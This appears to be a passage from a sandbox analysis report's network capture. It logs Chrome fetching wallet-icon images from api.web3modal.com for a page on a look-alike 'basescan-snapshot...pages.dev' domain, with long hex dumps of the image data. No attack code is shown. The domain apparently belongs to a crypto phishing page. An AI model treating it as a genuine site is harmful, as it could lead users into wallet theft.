                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1025INData Raw: ee bf fa aa 56 af 73 6f 2a 6b 3c 8e 64 de 95 f9 9a c9 31 d6 f7 c0 de da fc 38 9b 89 5c d8 a5 54 ab 95 a7 e1 f9 04 31 52 89 46 1f fc 79 ee 5b 2d 3e 71 e8 34 7b c2 9e dd b9 27 f3 d4 ee 74 0b f3 07 11 0d 79 05 7d ff f1 12 61 11 bd 41 2c f1 97 41 f5 b1 0f 3f a5 9f 3d a2 3f 6f bd 24 b0 1f 23 c1 60 22 6e 26 fb be 43 8b 68 69 d4 e4 80 a7 ea 44 72 02 c0 24 67 4b 27 d5 63 b7 dd c3 6e 99 d1 3b c4 d3 6c 46 31 05 6b bf 92 72 45 39 7f 6e 83 9d 7b 52 7b c1 be f5 75 ad c3 ea 0b de 69 a4 3a 42 81 8d 19 14 ce f1 20 4e 6f df fc 27 a0 75 92 55 4a b0 fb 19 b6 9b 5f ce f6 d3 52 23 69 f8 8d d9 97 df c8 e6 cb e9 1a 51 f6 a4 fe 91 49 72 4d a6 3f 84 83 7b 1c 9d ad f0 57 5c a8 8f a0 cf a6 05 b1 16 1d 65 ec cf c5 e7 4e 6a 07 28 89 c1 5e 9e 23 53 5d 93 f5 d0 d6 c3 1f f8 29 cc 32 8c
                                                                                                                                                                                                                                              Data Ascii: Vso*k<d18\T1RFy[->q4{'ty}aA,A?=?o$#`"n&ChiDr$gK'cn;lF1krE9n{R{ui:B No'uUJ_R#iQIrM?{W\eNj(^#S])2


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              68192.168.2.549804104.18.29.724435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC806OUTGET /public/getAssetImage/41d04d42-da3b-4453-8506-668cc0727900 HTTP/1.1
                                                                                                                                                                                                                                              Host: api.web3modal.com
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              x-sdk-version: html-ethers5-3.2.1
                                                                                                                                                                                                                                              x-sdk-type: w3m
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              x-project-id: 9a504add1206ecb902aee52264862b81
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC781INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:04 GMT
                                                                                                                                                                                                                                              Content-Type: image/webp
                                                                                                                                                                                                                                              Content-Length: 4528
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              CF-Ray: 8c9fe2d14c05436f-EWR
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Access-Control-Allow-Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              Age: 22754
                                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                              ETag: "cfIBgbS-WAFgZUOOKJGP6fnCtOUG7FeV1c8ZwDJoU7DQ"
                                                                                                                                                                                                                                              Expires: Sun, 28 Sep 2025 01:16:04 GMT
                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                              access-control-allow-credentials: true
                                                                                                                                                                                                                                              cf-bgj: imgq:86,h2pri
                                                                                                                                                                                                                                              cf-images: internal=ok/- q=0 n=867+20 c=0+20 v=2024.9.3 l=4528 f=false
                                                                                                                                                                                                                                              content-security-policy: default-src 'none'; navigate-to 'none'; form-action 'none'
                                                                                                                                                                                                                                              x-content-type-options: nosniff
                                                                                                                                                                                                                                              x-robots-tag: noindex
                                                                                                                                                                                                                                              X-WC-R2-Status: HIT
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC588INData Raw: 52 49 46 46 a8 11 00 00 57 45 42 50 56 50 38 20 9c 11 00 00 70 65 00 9d 01 2a 90 01 90 01 3e 49 24 8e 45 a2 a2 21 12 fc e4 20 28 04 84 b2 b7 7e 3e 4c b8 f0 04 5b fb 73 fb 8e e0 6f fb e0 ff 1f 7f 26 fb 28 b8 97 bd ff 8e dc e9 e8 37 d6 8f 90 3c 9b fd af f5 bb e7 d7 a1 2f d5 1f bf 7f 00 5f a4 9f d7 7f a1 7f 80 fd 5b ee 43 e6 8f fa 5f f7 af 5a 6f fa 1e bb bf cf 7a 81 ff 96 ea 43 f4 0d e9 71 fe bd ff 1b f7 7f d8 83 ff ff f2 9f ff 7d dd 1d 2b fd 85 ec 6f fb cf 49 47 8b bd a5 e6 4b 10 5f 95 7e 4c 89 95 e0 1f c9 ff af fa 15 43 f8 ff 7e e6 52 7b ea 8f fb f5 c6 f2 6f 99 c1 3f 94 88 8e e3 ad 2a 8e 5e 67 bf 36 ce a9 31 a5 51 9b 67 b2 a8 f1 d6 9d 0e c3 2d 2a 8c db 3c 7a ed fe 86 5e 37 57 c4 db 3a a4 c6 95 46 6d 9d 52 63 4d dc 0b 7f a1 97 8d b3 aa 4c 69 54 66 ea f8 9b
                                                                                                                                                                                                                                              Data Ascii: RIFFWEBPVP8 pe*>I$E! (~>L[so&(7</_[C_ZozCq}+oIGK_~LC~R{o?*^g61Qg-*<z^7W:FmRcMLiTf
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: b2 03 40 8e 8f a8 c5 63 31 e5 33 af 94 b7 fb a3 ce 7b ed 42 2f 8d b4 31 52 cd 3a 65 93 f6 4e 62 3f cc c5 36 f1 b6 b2 25 25 2c a2 05 3d b3 ff fc cc b9 ac e5 a6 a9 36 72 b9 e6 e0 8c bc c4 af af 5a 6e 23 c7 5a 55 19 b6 40 b7 de 19 65 69 36 00 fe 8a 4b b2 f4 00 6f 31 9a 65 54 aa 04 98 25 3f 98 78 eb 4a 6a 63 b7 df c1 a8 cf e0 09 eb 65 d1 bf fb fa cd b9 35 8a a9 0f f5 39 65 c3 0d f1 1b 1a 50 96 39 56 75 49 8d 2a 8c db 1b 87 42 bb c6 72 5c c9 33 d6 c5 1b e0 81 91 bb ff f2 87 66 32 05 b2 d2 aa 21 0e 5e 36 ce a8 72 3a 45 e7 32 17 8f 64 5d 47 7f f1 ff ff f1 ae 43 e8 65 e3 e1 3c 47 8e b4 aa 45 85 5c 16 95 46 6d b1 ba cc 01 e3 ad 2a 8c da 18 75 6c d5 47 46 1e 3a d2 a8 cd b3 aa 4c 69 54 67 bf 36 ce a9 31 a5 51 9b 67 54 98 d2 aa 1c a0 0a f1 b9 3f bc 6d 9c 20 00 fe fe
                                                                                                                                                                                                                                              Data Ascii: @c13{B/1R:eNb?6%%,=6rZn#ZU@ei6Ko1eT%?xJjce59eP9VuI*Br\3f2!^6r:E2d]GCe<GE\Fm*ulGF:LiTg61QgT?m
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: f6 74 06 c1 b1 7a fc df ee 0d 92 ef ce f4 13 70 a2 0a 28 02 ec fc 20 9d ef 05 7f 7c a0 f4 51 28 b9 b1 96 b3 48 39 43 40 d9 78 44 41 4b a7 fa 29 45 cc 80 85 4a 66 64 d3 30 b1 33 21 22 23 13 02 95 54 59 93 e6 ed c2 14 7f e2 26 51 9d ff de 9b 43 39 14 b0 25 16 10 56 c2 7a d6 b5 0b d3 44 13 7f ed 66 6e d5 60 f1 96 c1 ba 5c 41 2e e3 82 bb c6 e9 88 b9 08 dd c0 31 82 dc b8 68 00 17 13 a2 b9 f5 13 06 a1 25 d8 af a3 ff 2e 48 5b e5 76 ca 16 b7 13 56 04 72 38 3b 75 fc 6b ae d8 82 42 9b 33 ec 42 ba 85 fb 92 9d fc b7 02 f9 c5 65 e2 0a e4 2b c8 cf 13 49 ff a2 d1 2a a4 ce 3d 9e 37 4e c5 e2 3a e5 6e d4 10 0c 59 53 e5 b8 10 aa 45 42 b1 bc 94 e8 7b 41 77 7e 30 45 e2 1a fd 0d 96 35 30 d8 de ba a4 90 81 ee c2 15 55 3c f8 59 ff 31 54 08 f8 68 9a 9f 1c ea 07 04 01 fc 0e f4 3a
                                                                                                                                                                                                                                              Data Ascii: tzp( |Q(H9C@xDAK)EJfd03!"#TY&QC9%VzDfn`\A.1h%.H[vVr8;ukB3Be+I*=7N:nYSEB{Aw~0E50U<Y1Th:
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1202INData Raw: ac c7 9f 10 5f fe 68 c0 b0 53 56 4d bb 8a 00 83 0e 8d 38 d2 d4 17 dc af e0 20 41 f5 76 4f 56 49 d3 b1 90 66 cd e8 16 b8 4d 47 92 ee 00 25 a0 fe ed 8e 74 fd f3 14 7e 70 fa 10 58 ec c5 15 63 41 1c e6 40 00 d0 94 13 35 ad fc d6 26 ae 92 79 3f cb 4c 7e 67 b6 41 9c 39 a3 c2 b7 b1 51 2e c4 17 19 ad 5c 1d 54 6e e9 ee c8 a4 b0 85 8d ed 69 b7 58 e3 fa cd 7b 67 c6 42 d9 bc 82 4a 97 13 e6 87 4f 55 1b 92 a6 b9 a7 26 9e 7e 30 9c aa 0b 40 95 72 86 a6 e5 56 32 b9 85 61 7d 82 7c 78 9d 0e d0 56 f0 60 65 37 51 4b f6 f6 be 6d a8 13 e1 eb 91 2b c4 aa 9e a4 09 5b 5c 33 66 3b 79 41 14 18 14 ff 50 07 72 ba a1 b4 fd 49 c8 82 66 e0 e6 6a 85 39 3b 18 69 7d 02 59 da c7 42 ee 4d 7f cd 35 e1 4f cc 67 a9 c6 20 7d fe b2 64 88 00 1d 24 55 6e 82 20 e2 7b be f5 df 48 c2 80 64 e8 c1 8f 60
                                                                                                                                                                                                                                              Data Ascii: _hSVM8 AvOVIfMG%t~pXcA@5&y?L~gA9Q.\TniX{gBJOU&~0@rV2a}|xV`e7QKm+[\3f;yAPrIfj9;i}YBM5Og }d$Un {Hd`


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              69192.168.2.549806104.18.29.724435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC806OUTGET /public/getAssetImage/600a9a04-c1b9-42ca-6785-9b4b6ff85200 HTTP/1.1
                                                                                                                                                                                                                                              Host: api.web3modal.com
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              x-sdk-version: html-ethers5-3.2.1
                                                                                                                                                                                                                                              x-sdk-type: w3m
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              x-project-id: 9a504add1206ecb902aee52264862b81
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC741INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:04 GMT
                                                                                                                                                                                                                                              Content-Type: image/webp
                                                                                                                                                                                                                                              Content-Length: 5806
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              CF-Ray: 8c9fe2d149138c23-EWR
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Access-Control-Allow-Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              Age: 24530
                                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                              ETag: "cfuwYBbesV8l5_F8TO91Cr3GddUG7FeV1c8ZwDJoU7DQ"
                                                                                                                                                                                                                                              Expires: Sun, 28 Sep 2025 01:16:04 GMT
                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                              cf-bgj: imgq:86,h2pri
                                                                                                                                                                                                                                              cf-images: internal=ok/- q=0 n=465+14 c=0+14 v=2024.9.3 l=5806 f=false
                                                                                                                                                                                                                                              content-security-policy: default-src 'none'; navigate-to 'none'; form-action 'none'
                                                                                                                                                                                                                                              x-content-type-options: nosniff
                                                                                                                                                                                                                                              x-robots-tag: noindex
                                                                                                                                                                                                                                              X-WC-R2-Status: HIT
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC628INData Raw: 52 49 46 46 a6 16 00 00 57 45 42 50 56 50 38 20 9a 16 00 00 30 82 00 9d 01 2a 90 01 90 01 3e 49 24 90 45 22 a2 21 93 ea 2c 64 28 04 84 b2 b7 70 b9 ef 0e b5 fd 00 0d fb ff 53 ba 83 38 fa 4f f0 1f b5 9e e2 56 9f f2 df d7 3f 56 7f 64 f5 40 f1 83 ca fc d8 7c 6f f7 2f f2 7f de bf 30 fb 64 79 80 7f 0b fe 43 fa 99 d7 ff cc 97 fc 7f 49 6f 50 9e 80 1f b4 1f ff ff ff f6 95 7a 03 79 b2 7f be fd c5 ff ff f2 c9 fb c3 fb a5 98 4d f3 df ed 7f ee bb 64 ff 41 f9 39 eb 7f 93 6f 51 fb 69 f8 77 cf 76 21 df 29 fc 03 fb 8f ee df b8 3c 99 ef 22 fe 5b fe 23 7c ff cb f3 1a b4 f3 5e c5 b9 3e fd ea 0d fc 53 ce 07 fe ef b9 9f 86 ff 59 7f e5 12 64 ad 3a 28 b5 7a 4a f5 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 8b 07 7e 6f ff c8 76 b0 9f 81 fa 02 04 ad 4e 2b 33 33
                                                                                                                                                                                                                                              Data Ascii: RIFFWEBPVP8 0*>I$E"!,d(pS8OV?Vd@|o/0dyCIoPzyMdA9oQiwv!)<"[#|^>SYd:(zJ~ovN+33
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: aa 68 6e 03 ef b0 79 2f 3c 77 65 65 2e 7e cc 0b e8 b5 1d 13 26 e1 3d 8c 94 5a 14 51 3c 8b 03 b0 c8 7d 96 04 60 3a 15 f1 10 6b 35 84 ed 7e 58 d9 c5 ab a9 4e ee 42 29 e6 c3 b6 db 2e e9 10 92 8d 84 f5 56 5e 86 22 a4 a9 5f b0 cf b2 b7 2b 71 78 f6 27 11 3a 51 34 47 e3 ee a4 28 08 5d 47 69 cc 2c b3 4f 4b 44 bd 55 c0 0c e1 9a 02 81 82 9f 2c 87 8c 5b dd ec d1 9b b3 f2 ce 3c 57 a1 b4 54 29 aa c9 41 03 8f 61 4e dc 65 dc 66 a9 55 be 70 ec 5e 86 a2 ea 8c b6 fd a7 e6 4e 16 b3 36 52 96 1b a9 ee 45 80 98 d4 a9 72 93 f6 96 23 0e 47 72 88 5a aa 68 7d 68 03 77 b6 0b 43 db a3 fd a3 38 cb 9f c3 26 7a 5e e9 26 88 9c 71 a2 d0 63 53 43 1a 80 86 7f 0d 1d 06 6b 72 93 18 0a 95 2c dd 7e 95 ad ad 6d e7 86 0a a3 8d 2f 8a a7 52 f3 be 67 26 53 9c dc 5c d2 89 dc 09 3b 42 8c 2f ef 3f 7c
                                                                                                                                                                                                                                              Data Ascii: hny/<wee.~&=ZQ<}`:k5~XNB).V^"_+qx':Q4G(]Gi,OKDU,[<WT)AaNefUp^N6REr#GrZh}hwC8&z^&qcSCkr,~m/Rg&S\;B/?|
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: d1 96 31 85 f4 08 be 04 85 86 bf d8 1e b2 54 62 07 b8 7b 47 1c 37 c2 ca 88 be 6b a8 f0 14 1b fc 71 cf fe 0b be 15 78 e9 d5 c9 09 26 51 ae 56 6b 97 c3 4e b2 ef f1 12 02 ff f8 f3 fd 03 1b ab 09 fd 4d b2 80 d6 72 01 b9 22 3b 0c 8f 18 79 33 21 a2 36 86 b5 0c a4 a9 06 48 df f9 2e c4 11 bb b5 d9 c2 52 ae 16 8b 93 07 9a e1 8b a1 08 ff 55 9e fe 79 23 b2 4b 87 f3 0f 5a b8 7d 87 b2 96 f5 f7 d7 69 1b 91 c0 76 aa 80 6c 6d 98 3e 9d 0c f2 52 b2 08 d8 6c 34 b6 59 1d 01 31 45 ad 8c 1a a7 eb 36 0f 53 d7 ff 39 a9 92 d9 28 f6 e2 6b 75 eb 17 ab 0c 34 ae f4 fd 1b 25 49 74 1e 16 d1 12 03 8f f9 14 bc cb 68 3b ec 12 91 a0 d4 05 2f 1d 8c 77 4f 64 79 9a f9 9c 7e cc 61 04 26 54 a5 55 62 af bb c2 69 e8 08 e4 4a c6 21 d1 bb d7 cc cb 65 b9 8d de 45 92 1e 9e 73 b8 10 f7 05 1b c7 ad 6f
                                                                                                                                                                                                                                              Data Ascii: 1Tb{G7kqx&QVkNMr";y3!6H.RUy#KZ}ivlm>Rl4Y1E6S9(ku4%Ith;/wOdy~a&TUbiJ!eEso
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: 40 21 75 4c 9e 25 50 ae 6e fd e1 72 bc 37 93 b7 71 76 17 48 b6 43 bc 9c fa 27 10 e9 f6 7a b8 6c a4 bc 61 2e dc 7d 00 98 1d 75 31 6e 0c a8 15 c7 ea 95 29 a5 fa b8 e3 34 c2 47 e7 20 f3 4a 53 b2 d9 53 d0 ce be 44 e8 13 7f ca 36 ad fb bc 38 ce 3a a6 56 0e e8 29 5a 70 ec 65 ab a2 cf 03 7a 78 6f e2 4f c9 75 a0 91 0e ba 74 80 f4 7b a0 e4 e6 4a db 59 77 88 5e bf 6a 6b f3 b1 c2 40 fc dc 1c 48 90 5e 4b b7 fd 53 54 19 16 56 fa 07 3c ab f0 72 65 e4 d2 b2 b9 16 43 38 17 73 51 4b 87 13 3e 6a cc d1 39 d3 1d 8e e8 8c 84 4a 1c fd 6a 4d 82 64 75 3f 93 df bb 04 ab 9e 76 94 0e d3 11 39 80 05 3f 2e 28 a4 d2 95 26 bb 33 23 e6 90 95 09 64 15 b9 5a 88 45 56 9a 30 ab ed fe ef 99 30 6c 0c 87 b2 5a e1 76 1f 00 2e f4 71 52 94 64 49 c4 49 76 f0 59 62 58 76 4f 27 7f 4d 98 8e c4 bd 6f
                                                                                                                                                                                                                                              Data Ascii: @!uL%Pnr7qvHC'zla.}u1n)4G JSSD68:V)ZpezxoOut{JYw^jk@H^KSTV<reC8sQK>j9JjMdu?v9?.(&3#dZEV00lZv.qRdIIvYbXvO'Mo
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1071INData Raw: 05 ef 6c 63 53 bb a8 03 f5 b2 10 82 29 87 59 53 20 26 2a b3 47 eb 08 ab f8 f1 2c 6c 22 4e fc c6 15 32 94 14 1b 0e e0 75 84 e9 d2 9d fa 7f 67 b0 67 af ec c0 46 64 49 04 cd fd 4b 50 ed c0 63 bb d8 ef d1 4f 8c af d7 bb 2c d2 0d 2f 9b 63 6f 87 dd b4 70 60 af 8e 85 2d f1 ab 4e 8a 6f 65 5c 80 4b 34 ec b7 b5 05 74 12 cb 47 40 30 de a7 60 fe c4 8c 9b e1 9e a1 f0 7f f6 12 8f d1 bd 6b ad 16 2c bf 91 d4 43 74 49 ea 2f b8 61 7d a5 88 6a b1 b5 f8 61 16 b6 37 7b c6 d6 25 af e7 51 96 f5 f0 94 eb 83 17 36 84 08 d1 52 a6 f0 9f 15 aa f0 e7 8d ee da 4f 4f 8f 86 be 55 4d 24 e1 c4 9b 58 01 ab 76 4d de 3b 24 f3 1f 22 10 f9 1e fe 4c a3 36 52 9e ae f6 8e 2f e2 47 c4 2c 7a 8f 55 ff f4 ac c4 f1 05 83 c9 29 7f 3f 56 90 90 1c 8f 60 e0 12 8e 1f c7 c8 5f 46 c8 54 f8 28 5d fe e0 8b 8b
                                                                                                                                                                                                                                              Data Ascii: lcS)YS &*G,l"N2uggFdIKPcO,/cop`-Noe\K4tG@0`k,CtI/a}ja7{%Q6ROOUM$XvM;$"L6R/G,zU)?V`_FT(]


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              70192.168.2.549809104.18.29.724435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC806OUTGET /public/getAssetImage/7289c336-3981-4081-c5f4-efc26ac64a00 HTTP/1.1
                                                                                                                                                                                                                                              Host: api.web3modal.com
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              x-sdk-version: html-ethers5-3.2.1
                                                                                                                                                                                                                                              x-sdk-type: w3m
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              x-project-id: 9a504add1206ecb902aee52264862b81
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC786INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:04 GMT
                                                                                                                                                                                                                                              Content-Type: image/webp
                                                                                                                                                                                                                                              Content-Length: 48440
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              CF-Ray: 8c9fe2d1bff619a1-EWR
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Access-Control-Allow-Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              Age: 38968
                                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                              ETag: "cfyIALQyO304C0r9GmkKxVyBXPUG7FeV1c8ZwDJoU7DQ"
                                                                                                                                                                                                                                              Expires: Sun, 28 Sep 2025 01:16:04 GMT
                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                              access-control-allow-credentials: true
                                                                                                                                                                                                                                              cf-bgj: imgq:100,h2pri
                                                                                                                                                                                                                                              cf-images: internal=ok/- q=0 n=326+183 c=2+181 v=2024.9.3 l=48440 f=false
                                                                                                                                                                                                                                              content-security-policy: default-src 'none'; navigate-to 'none'; form-action 'none'
                                                                                                                                                                                                                                              x-content-type-options: nosniff
                                                                                                                                                                                                                                              x-robots-tag: noindex
                                                                                                                                                                                                                                              X-WC-R2-Status: HIT
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC583INData Raw: 52 49 46 46 30 bd 00 00 57 45 42 50 56 50 38 4c 24 bd 00 00 2f 8f c1 63 00 4d 40 8c 24 5b 48 54 33 a2 78 37 9f fc 03 fe 9f 8f 21 44 f4 7f 02 a8 d4 ba b4 d0 4a b1 b3 ca 39 d5 b3 5b 4b 48 6b 4a 29 63 7d 83 2a 2c 30 14 d4 ea 50 07 15 ad 80 b2 14 d1 a9 98 d4 96 18 af 6a 15 1c 20 bd 81 d7 0a 1d 27 dd 53 05 2d 17 40 95 d2 87 15 e8 46 6c 15 45 c0 c2 f3 4e 70 63 49 04 13 ac 18 9f 74 4c 59 a0 ca b3 ed 10 d5 05 60 8f 01 ba 3b 9b a0 6e b2 99 9d 01 11 83 73 b4 18 a4 df 9d 23 68 77 5c 50 25 35 aa ce cf c8 f3 ac af ba c0 bd d7 2b f4 72 17 3e 87 1f f5 90 55 ea c6 78 95 35 94 d4 d6 c7 99 f9 99 9c b6 ff a2 34 b7 2b ce c3 fb 09 36 96 90 94 6d 9f 47 ab ca 7a c0 18 a8 a5 ee f4 f5 b6 ca 76 cf 88 96 2e ef fa d6 74 35 8a 2d ca 85 9b 2b af af 2a f6 90 00 09 68 d5 26 8b 66 1f 41
                                                                                                                                                                                                                                              Data Ascii: RIFF0WEBPVP8L$/cM@$[HT3x7!DJ9[KHkJ)c}*,0Pj 'S-@FlENpcItLY`;ns#hw\P%5+r>Ux54+6mGzv.t5-+*h&fA
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: 9d bd 9d 1f 8c c2 41 f1 45 64 3d cf fb 7e 2f 78 02 94 5d db 56 6d 2b 2d 2f 36 73 23 af e3 a7 44 16 ee 70 ff ff 4b 28 de 12 56 9a d8 cd f3 c8 72 2d c9 91 95 a3 11 0b 78 fb 5f 11 9e c4 bf f7 70 f9 89 e7 e2 dd a8 d5 ff 09 c0 c0 5b 07 2e 05 82 bb 81 4b 05 c1 83 e3 a1 bb 03 cf 54 58 ee 3d 1c 00 0a 02 e7 08 41 0b c0 c0 18 27 01 30 1e 88 d3 80 60 74 27 db 80 75 d1 3d 64 4b 0b 03 97 03 4f 95 30 46 34 00 89 e5 e2 32 46 dc 66 03 4f b7 22 42 70 12 30 60 11 18 10 34 92 3c 32 de 20 4b 2c b2 60 89 88 2d 60 8c 00 d2 b0 00 44 38 ee 01 e3 81 11 21 58 42 44 1c 88 85 d5 68 c6 0b 01 02 90 02 a3 23 c9 1b e4 c2 78 01 12 21 0e df ca 86 18 8e 4f fa ec fc 39 90 af af 45 e8 12 0b c2 af 2c 21 71 ed de c0 b8 88 78 41 6e 11 88 e0 7f 23 6e 8c 69 d2 ce 90 66 1c de 7a 10 9f 20 32 bc 10
                                                                                                                                                                                                                                              Data Ascii: AEd=~/x]Vm+-/6s#DpK(Vr-x_p[.KTX=A'0`t'u=dKO0F42FfO"Bp0`4<2 K,`-`D8!XBDh#x!O9E,!qxAn#nifz 2
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: af a0 5a cf a4 9e b8 50 10 6d 5d 32 0a d8 64 da 8a a2 ad 7b 54 51 6d 52 c7 15 87 57 54 ae 87 4d 04 59 20 42 55 39 66 04 e5 b0 a9 e3 0d 3c e1 01 05 65 c8 c0 28 08 ca 93 58 97 a9 72 b9 ca 28 37 84 a7 bb 8a 02 1e ca b4 c7 46 c4 e9 94 ab 78 ad 6c 68 58 7a 9d 80 8b b5 1d e0 50 d4 63 54 bd 31 f5 a8 ca c4 39 89 f4 a4 ad 28 76 cc a6 2d 5a b6 a6 8f b6 b5 ad 0a 4e 4b 45 07 80 89 b6 60 5b 4f a0 41 bd 29 a6 7c b8 38 c3 5d b5 f6 1b 74 d1 80 22 88 0a 7c 84 cb 01 05 26 9b 9f 4a 45 18 46 9b 7e fa b2 55 6d 52 3e bc 35 a9 e7 ca a6 f8 06 b7 0e ec 4c da af da 44 d9 71 34 29 7e 94 54 80 cd 35 69 df b0 4d 3c 71 c5 d0 a4 f8 a2 4d 2a 28 a7 03 c8 a1 49 fb d0 36 51 f1 32 8b d7 26 a9 b5 68 c7 24 75 06 27 39 27 6d 92 2e 93 54 e5 e0 14 19 45 54 a4 6d 93 a4 cd d9 56 14 e5 4b 55 70 04
